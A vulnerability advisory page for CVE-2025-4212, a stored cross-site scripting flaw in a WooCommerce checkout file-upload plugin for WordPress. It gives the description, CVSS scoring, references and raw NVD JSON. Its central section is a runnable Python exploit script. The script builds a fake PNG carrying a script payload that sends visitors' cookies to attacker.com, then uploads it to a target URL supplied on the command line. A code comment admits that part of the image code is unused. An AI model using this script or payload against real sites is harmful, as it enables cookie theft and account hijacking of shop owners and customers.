Security Vulnerability Report
CVE-2025-4212 CVSS 7.2 HIGH

Published: 2025-11-18 10:15:50
Last Modified: 2026-04-15 00:35:42

Description

The Checkout Files Upload for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via file uploads in all versions up to, and including, 2.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in image files that will execute whenever a user accesses the injected page.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Checkout Files Upload for WooCommerce <= 2.2.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import io
from PIL import Image
import argparse


def create_xss_image():
    """
    Create a malicious image file with embedded XSS payload.
    This PoC demonstrates the vulnerability in the Checkout Files Upload
    for WooCommerce plugin.
    """
    # XSS payload to be carried inside the uploaded "image"
    xss_payload = '<script>document.location="https://attacker.com/steal?cookie="+document.cookie</script>'

    # Create a simple PNG image (note: this image and the buffer below are
    # never used; the payload is appended raw after a bare PNG signature and
    # IHDR header rather than being placed in a tEXt metadata chunk)
    img = Image.new('RGB', (100, 100), color='red')
    img_bytes = io.BytesIO()

    # Create malicious PNG with embedded script
    # The plugin does not sanitize uploaded image content properly
    malicious_data = b'\x89PNG\r\n\x1a\n'  # PNG signature
    malicious_data += b'\x00\x00\x00\rIHDR\x00\x00\x00\x64\x00\x00\x00\x64\x08\x02\x00\x00\x00'
    malicious_data += xss_payload.encode()
    return malicious_data


def upload_exploit(target_url, image_data):
    """
    Upload malicious image to vulnerable WordPress site.
    """
    files = {
        'file': ('malicious_image.png', image_data, 'image/png')
    }
    try:
        response = requests.post(target_url, files=files, timeout=10)
        print(f'[+] Upload attempt completed. Status: {response.status_code}')
        return response
    except requests.exceptions.RequestException as e:
        print(f'[-] Upload failed: {e}')
        return None


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='CVE-2025-4212 PoC')
    parser.add_argument('--url', required=True, help='Target upload endpoint URL')
    args = parser.parse_args()

    print('[+] Generating malicious image...')
    payload = create_xss_image()
    print(f'[+] Uploading to {args.url}')
    upload_exploit(args.url, payload)

References

https://plugins.trac.wordpress.org/changeset?old_path=/checkout-files-upload-woocommerce/tags/2.2.1&new_path=/checkout-files-upload-woocommerce/tags/2.2.2
https://www.wordfence.com/threat-intel/vulnerabilities/id/09d9785a-db71-4735-b86b-7fa10cf36a0b?source=cve

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-4212",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-18T10:15:50.073",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Checkout Files Upload for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via file uploads in all versions up to, and including, 2.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in image files that will execute whenever a user accesses the injected page."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N",
            "baseScore": 7.2,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-79"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/changeset?old_path=/checkout-files-upload-woocommerce/tags/2.2.1&new_path=/checkout-files-upload-woocommerce/tags/2.2.2",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/09d9785a-db71-4735-b86b-7fa10cf36a0b?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}